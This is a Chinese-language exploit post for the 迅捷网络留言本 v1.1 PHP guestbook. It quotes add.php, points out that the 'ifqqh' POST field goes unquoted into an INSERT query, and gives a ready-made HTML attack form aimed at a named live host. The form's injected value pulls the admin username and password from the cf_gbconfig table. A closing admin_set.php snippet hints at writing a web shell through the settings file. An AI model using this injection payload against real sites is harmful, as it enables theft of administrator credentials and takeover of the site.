迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShell

add.php：

<?php
                 if($_POST['unum']==$_SESSION["randValid"]){
                        $username=addslashes(htmlspecialchars($_POST['username']));
                        $email=addslashes(htmlspecialchars($_POST['email']));
                        $content=addslashes(htmlspecialchars($_POST['content']));
                        $userip=$_SERVER["REMOTE_ADDR"];
                        $ifqqh=$_POST["ifqqh"];
                        if(empty($ifqqh)) $ifqqh=0;
                        $systime=date("Y-m-d H:i:s");
                        if(!empty($content) or !empty($username)){
                        $ifshow="";
                        //还原空格和回车
                        if(!empty($content)){
                                $content=str_replace("　","",$content);
                                $content=ereg_replace("\n","<br>　　",ereg_replace(" ","&nbsp;",$content));
                        }
                        if($ifauditing==1){$ifshow=0;}else{$ifshow=1;}
                        //还原结束
                        $sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";
                        //echo $sql;



$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
$sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";$ifqqh没有用   '  来包含。不受magic_quotes_gpc影响

Exp：

<form name="form1" method="post" action="http://guestboo.ibook.bz/add.php" onSubmit="return FrontPage_Form1_Validator(this)">
<p><img src="images/i1.gif" /><img src="images/add.gif" /></p><br />
<label for="user">昵称：</label><input type="text" id="username" name="username" value="123312" />*<br />
<label for="email">Email：</label><input type="text" id="email" name="email" value="" /><br />
<label for="comment">内容：</label><textarea id=content name="content"></textarea>*<br />
<label for="comment">　</label><span>提交前请按Ctrl+C保存留言内容，以免程序出错而丢失！
留言内容不能少于5个字符！</span><br />
<input type="text" id="ifqqh" name="ifqqh" value="6666666),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0" /><br /
<label for="email">悄悄话：</label>
<input name="ifqqh" type="checkbox" id="ifqqh" value="1"> <span>当选中时，此留言只有管理员可见</span><br />
<label for="umum">验证码：</label><input name="unum" type="text" id="unum" size="10">* <img src="http://guestboo.ibook.bz/include/randnum.php?id=-1" title="点击刷新" style="cursor:pointer" onclick=eval('this.src="include/randnum.php?id='+i+++'"')>
<br />
<input type="submit" id="sbutton" value="确  定" /><br /><input name="ac" type="hidden" id="ac" value="add">
</form>
</div>

admin_set.php：

// write the para file
$filenum = fopen ("include/para.php","w");
ftruncate($filenum, 0);
fwrite($filenum, $parafile);
fclose($filenum);
        echo "设置已保存，请稍候……<br><a href=".$pageUrl.">如果浏览器没有自动返回，请点击此处返回</a>";
        echo "<meta http-equiv=\"refresh\" content=\"2; url=".$pageUrl."\">";
?>